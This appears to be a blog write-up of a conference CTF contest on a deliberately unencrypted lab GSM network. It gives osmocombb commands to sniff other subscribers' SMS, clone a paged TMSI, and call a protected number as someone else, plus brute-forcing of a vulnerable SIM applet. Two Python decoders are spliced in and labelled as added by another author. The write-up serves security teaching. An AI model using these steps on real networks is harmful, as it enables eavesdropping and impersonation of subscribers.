Friday, July 3, 2015

The MiTM Mobile Contest: GSM Network Down at PHDays V

Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants see how easily an attacker can conduct the above-mentioned attacks with nothing but a $10 cell phone and some free hacking software.

Contest conditions and technologies
You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000. 
2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords. 
3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have access. 
There are other numbers in the network through which some employees get important information, but, unfortunately, we failed to find them. Besides, don't forget — you can always come across someone's private information in the corporate network.
The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.

We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.

So, it's all clear with the operator's trappings, let's now look at the network implementation. Our hardware solution was a device with a simple name — UmTRX (the manufacturer's site: ). The network's wireless part was based on this unit. The base station functionality and the GSM software part were implemented with the Osmocom/OpenBTS stack.

UmTRX is the heart of MiTM Mobile.

We also ordered SIM cards for a simple and quick network registration. The MiTM Mobile network credentials were written to them, and the card data were registered in the network. To simplify over-the-air interception and make the players' lives easier, we disabled encryption in our network (A5/0, i.e. no ciphering at all). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). All this, together with the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on behalf of another user.

Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.

Review of Tasks

Some theory at first:

  • IMSI — International Mobile Subscriber Identity, stored in the SIM card. 
  • MSISDN — Mobile Subscriber ISDN Number, the phone number assigned to an IMSI in the operator's infrastructure.
  • TMSI — Temporary Mobile Subscriber Identity, randomly assigned by the network to every mobile in the area the moment it is switched on.

IMSI is the magic number specified in the SIM card. It looks something like this — 250-01-XXXXXXXXXX, where 250 is the country code (Russia), 01 is the operator code (MTS), and XXXXXXXXXX is a unique ID. A subscriber is identified and authorized in the operator's network by the IMSI.

In this case, we have a sysmocom SIM card with 901 as the country code, 70 as the operator code, and 0000005625 as the subscriber's ID in the operator's network (see fig.).

The second thing you need to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's database, not on the SIM card. During a call, the base station inserts this number according to the IMSI <--> MSISDN mapping table (in a real network, the MSC/VLR performs this function). Or it doesn't (in the case of an anonymous call).

TMSI is a 4-byte temporary identifier given to the subscriber after the authorization.

Now that we know this, let's continue.

We need to run the osmocombb stack. The actions are quite simple. You need to connect the cable to the computer and pass it through to the virtual machine. A device named /dev/ttyUSB0 should appear there. After that, you should connect a TURNED-OFF cell phone to the cable through its audio jack.

Then you open two consoles. In the first one, you must run the following command:

#~/osmocom-bb-master/src/host/osmocon/osmocon  -p /dev/ttyUSB0  -m c123xor  -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin

Now press the red button of the cell phone to turn it on. This command uploads the firmware into the phone and opens the socket that mediates between the phone and the host programs. It is the so-called layer 1 of the OSI model: it establishes physical interaction with the network.

This is roughly what layer1 outputs to the console after it has been uploaded into the phone (this is not something of interest, though).

In the second console, you must run the following command:

#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan  -a 774  -i

This command establishes layers 2-3 of the OSI model, namely air tapping in search of CCCH (Common Control Channel) packets.

774 is the ARFCN we broadcast on. Yeah, nobody needs to look for our operator's channel. We did everything we could to make your life easier, our dear participants :)

-i is the interface the packets will be sent to.

Now, you launch Wireshark. It will do everything for you: for instance, it will reassemble all the necessary packets into SMS messages, parse the TPDU/PDU format, and show everything in an easy-to-read form.

Remember, for the first task you were to intercept an SMS message. To make browsing in Wireshark more convenient and keep the screen "clean", set the display filter to gsm_sms packets.

Now you can see the SMS messages on the air. Congrats, you've completed the first task! If you were at PHDays V now, you would see the SMS message containing the code for getting publes. The code was sent over the air constantly during the two days, every five minutes, and even at night.

You must run layer1 again for the second task (or you can just keep it on after the previous one).

In the second console, you run the following command as layer2-3:

#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i

Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, you must open the third console and run

$ telnet 4247

A Cisco-like interface will open. You must enable the extended mode:

OsmocomBB> enable

After that, you should display the list of commands available:

OsmocomBB# list

What do you think the clone command does? Well, its name speaks for itself – you can clone a subscriber. In the description of the command, you can see it accepts a TMSI as an argument. If you manage to find out the victim's TMSI and load it into your phone, you will be able to connect to the network instead of the original subscriber.

During the whole conference, we kept sending an SMS message to a phone number missing from the network. If a participant passed the TMSI the base station was paging as the clone command parameter, he or she would get the flag with the code for money.

OsmocomBB# clone 1 5cce0f7f

It was quite easy to see the base station's request to the subscriber. You could look for gsmtap packets in Wireshark containing a Paging Request Type 1 (the request the base station makes when a call or SMS is originated).

Alternatively, you could use the second console that has mobile launched:

After you type the TMSI, you will get an SMS message intended for the initial subscriber.
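To show what Wireshark is decoding at this step, here is an added example (not code from the PHDays post or from osmocombb) that parses a GSM 04.08 Paging Request Type 1 as it appears in a 23-byte CCCH downlink block; the two sample blocks are constructed for this example, reusing the TMSI and IMSI values quoted in the post. Because the contest network ran A5/0, any passive receiver can read the paged identity, which is exactly why the TMSI should be treated as a weak secret.

```python
# Added example, not from the PHDays post: decode a GSM 04.08 Paging Request
# Type 1 exactly as it appears in a 23-byte CCCH downlink block. On a network
# running A5/0 the paged identity is readable by any passive receiver; this is
# what Wireshark shows under "Paging Request Type 1".
from typing import Dict, List

RR_PD = 0x06              # RR protocol discriminator, skip indicator 0
PAGING_REQ_TYPE_1 = 0x21  # message type
ID_TYPES = {0: "none", 1: "IMSI", 2: "IMEI", 3: "IMEISV", 4: "TMSI"}


def parse_mobile_identity(ie: bytes) -> Dict[str, str]:
    """Parse a 24.008 Mobile Identity value (length octet already removed)."""
    kind = ID_TYPES.get(ie[0] & 0x07, "reserved")
    if kind == "TMSI":
        return {"type": kind, "value": ie[1:5].hex()}
    if kind in ("IMSI", "IMEI", "IMEISV"):
        odd = bool(ie[0] & 0x08)          # odd/even indication bit
        digits = [ie[0] >> 4]             # digit 1 sits in the high nibble
        for b in ie[1:]:
            digits += [b & 0x0F, b >> 4]  # low nibble first, then high
        if not odd:
            digits.pop()                  # even count: last nibble is 0xF filler
        return {"type": kind, "value": "".join(str(d) for d in digits)}
    return {"type": kind, "value": ""}


def parse_paging_request_type1(block: bytes) -> List[Dict[str, str]]:
    """Return the identities paged in one CCCH block (Mobile Identity 1 and 2)."""
    l2_len = block[0] >> 2                # bits 8..3 of the L2 pseudo-length octet
    if block[1] != RR_PD or block[2] != PAGING_REQ_TYPE_1:
        raise ValueError("not a Paging Request Type 1")
    # block[3] carries page mode (low nibble) and channels needed (high nibble)
    ids, pos = [], 4
    n = block[pos]                        # Mobile Identity 1 is LV-coded
    ids.append(parse_mobile_identity(block[pos + 1:pos + 1 + n]))
    pos += 1 + n
    if pos < 1 + l2_len and block[pos] == 0x17:   # optional Mobile Identity 2, TLV
        n = block[pos + 1]
        ids.append(parse_mobile_identity(block[pos + 2:pos + 2 + n]))
    return ids


# Constructed sample blocks (0x2b is the standard L2 fill octet):
# pseudo-length 9, PD 0x06, type 0x21, page mode 0, TMSI 5cce0f7f (the post's value)
SAMPLE_TMSI_PAGING = bytes.fromhex("2506210005f45cce0f7f") + b"\x2b" * 13
# pseudo-length 19, IMSI 901700000005625 (the post's SIM) plus a second, made-up TMSI
SAMPLE_IMSI_PAGING = bytes.fromhex(
    "4d0621000899100700000065521705f4deadbeef") + b"\x2b" * 3

if __name__ == "__main__":
    for block in (SAMPLE_TMSI_PAGING, SAMPLE_IMSI_PAGING):
        print(parse_paging_request_type1(block))
```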

Now you have enough information for the third task. Here, you have to pretend to be another subscriber, as in the previous task. You know his number, but not his TMSI. What can you do? It's easy: you just have to send an SMS message to the subscriber or call him at the number 77777. You will see the base station's requests to the 77777 subscriber, as in the last example. Note: you must use another cell phone for the call or SMS; otherwise, your Motorola won't see the base station's broadcast requests intended for the target subscriber.

After that, you need to load the TMSI into your phone by means of the clone command and make a call to the precious number!

OsmocomBB# call 1 2000

Now you take Motorola and listen to the code. If the participants have done everything right, they will hear it, otherwise — a joke will be the sole thing they get :)

Additionally, there were SMS messages in the network that informed about a new voice message received. If the participants hadn't been lazy and had opened the phone book of the device, they would have seen the number of the voice mail. If you call this number, you can hear insider information — data about increase and decrease in the rate of MiTM Mobile shares.

The fourth task was connected not so much with GSM as with the vulnerable SIM cards used for getting access to the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting — "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for searching for vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So, you need to plug the SIM card into the phone, connect it to your computer, and start the search. After a couple of minutes, you can analyze the data obtained:

Apart from lots of apps disclosing enough information for key brute forcing, you have been provided with a "red" application, which doesn't require any secret keys for access. Let's analyse it separately:

The last two bytes of the SIM card reply are the status bytes, where, for instance, 0x9000 means that the command has been completed successfully. In this case, you get 0x9124, which means there are 36 bytes the card wants to return to us. Let's change the program code a little and see what kind of data it is.

After decoding, you will get:

>>> 'D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')
'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'

You need to brute force all the possible CLAs and INSs for the instructions sent in the binary SMS message — and you will get the flag:

>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')
'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'
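The two replies above are SIM Toolkit proactive commands, so as an added example (not code from the post or from SIMTester) here is a small decoder for them: it interprets the 91xx status word, walks the COMPREHENSION-TLV structure of the D0 command per ETSI TS 102 223, and pulls out the command type, device identities and text. The hex strings are the ones quoted in the post; the device and command name tables are deliberately limited to the values that occur here.

```python
# Added example, not from the PHDays post or SIMTester: decode the two card
# responses shown above. A 91xx status word means "normal ending, xx bytes of
# proactive command waiting to be fetched"; the fetched D0 TLV is a DISPLAY TEXT
# proactive command as defined in ETSI TS 102 223.
from typing import Any, Dict, List, Tuple

CMD_TYPES = {0x21: "DISPLAY TEXT", 0x13: "SEND SHORT MESSAGE", 0x10: "SET UP CALL"}
DEVICES = {0x02: "Display", 0x81: "UICC", 0x82: "Terminal", 0x83: "Network"}


def status_word(resp: bytes) -> Dict[str, Any]:
    """Interpret the trailing SW1 SW2 of an APDU response."""
    sw1, sw2 = resp[-2], resp[-1]
    if (sw1, sw2) == (0x90, 0x00):
        return {"ok": True, "pending": 0}
    if sw1 == 0x91:                         # proactive command of sw2 bytes pending
        return {"ok": True, "pending": sw2}
    return {"ok": False, "pending": 0, "sw": f"{sw1:02X}{sw2:02X}"}


def split_tlvs(data: bytes) -> List[Tuple[int, bytes]]:
    """Split a COMPREHENSION-TLV sequence; the 0x80 bit of a tag is the CR flag."""
    out, i = [], 0
    while i < len(data):
        tag, length, i = data[i] & 0x7F, data[i + 1], i + 2
        if length == 0x81:                  # two-byte length form (128..255)
            length, i = data[i], i + 1
        out.append((tag, data[i:i + length]))
        i += length
    return out


def parse_proactive_command(resp: bytes) -> Dict[str, Any]:
    """Decode a D0 proactive command returned by FETCH (status word included)."""
    body = resp[:-2]
    if body[0] != 0xD0:
        raise ValueError("not a proactive command")
    length, i = body[1], 2
    if length == 0x81:
        length, i = body[2], 3
    result: Dict[str, Any] = {"status": status_word(resp)}
    for tag, val in split_tlvs(body[i:i + length]):
        if tag == 0x01:    # command details: number, type, qualifier
            result["command"] = CMD_TYPES.get(val[1], f"0x{val[1]:02X}")
        elif tag == 0x02:  # device identities: source, destination
            result["from"] = DEVICES.get(val[0], f"0x{val[0]:02X}")
            result["to"] = DEVICES.get(val[1], f"0x{val[1]:02X}")
        elif tag == 0x0D:  # text string: DCS octet then text (0x04 = 8-bit data)
            result["text"] = val[1:].decode("latin-1") if val[0] == 0x04 else val[1:].hex()
    return result


# The two responses quoted in the post (hex copied from the text above)
RESP_CLOSE = bytes.fromhex("D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000")
RESP_FLAG = bytes.fromhex("D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000")

if __name__ == "__main__":
    print(status_word(bytes.fromhex("9124")))   # 36 bytes pending == len(RESP_CLOSE) - 2
    print(parse_proactive_command(RESP_CLOSE))
    print(parse_proactive_command(RESP_FLAG))
```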

That's it, as far as the tasks are concerned.

Contest winners and surprises

All the PHDays participants could try their hand at the MiTM Mobile contest alongside the CTF teams: those who wished to take part were provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.

However, the only one who managed to intercept the SMS message in the middle of the first day was Gleb Cherbov, who ultimately became the contest winner.

Only the More Smoked Leet Chicken team managed to complete three tasks by the beginning of the second day. The fourth task was available only for the CTF participants, but everybody failed it.

The forum visitors could notice that LTE and 3G were missing occasionally, and sometimes the network was not available if you came close to the zone with the GSM jammers, which looked like this:

Some people were getting messages from the number 74957440144 (or from an anonymous one) with the text "SMS_from_bank" or some other "harmless spam". It was connected with the operation of the MiTM Mobile network.

Also, some "luckers" got the following message by the end of the second day:

This joke has nothing to do with the functioning of MiTM Mobile, but it reminds everyone once again of general safety rules. Watch out for your pet phone, which suddenly starts finding the MosMetro_Free network (the free WiFi network in the Moscow underground) in a place where it shouldn't be, connects to it, and lots of apps walk straight into a trap. Some of them use the phone number as an identifier. The attacker can get this number and then send messages out through an SMS gateway to all the "luckers".

P.S. Here are the details about the network components for all those who would like to make a contest similar to our MiTM Mobile.

The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the manuals concerning the configuration can be found at or You may also use a ready-made solution from UmTRX — UmDESK, it has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.

You can find an image of the osmocombb stack here (we highly recommend VMware 11). This build is enough for experimenting. SIM cards are not necessary, but you have to get a cell phone and any USB-UART cable.

You could choose any cell phone from the list:

And, yes, you can find PL2303 and FT232 almost everywhere. Unsoldering a 2.5 mm mini-jack is a piece of cake.

You can order SIM cards and the cable here:

Such as
USB-UART (CP2102):
SIM cards:

You can find cell phones on eBay, buy them in pedestrian underpasses, or order them from China: on average, you will spend $10 per phone.

We want to express special gratitude to the guys from Fairwaves (they are the ones who make UmTRX, UmDESK, UmROCKET, etc.) for consulting and for the equipment provided for testing. They do a GREAT thing! And also, special thanks to Ivan.

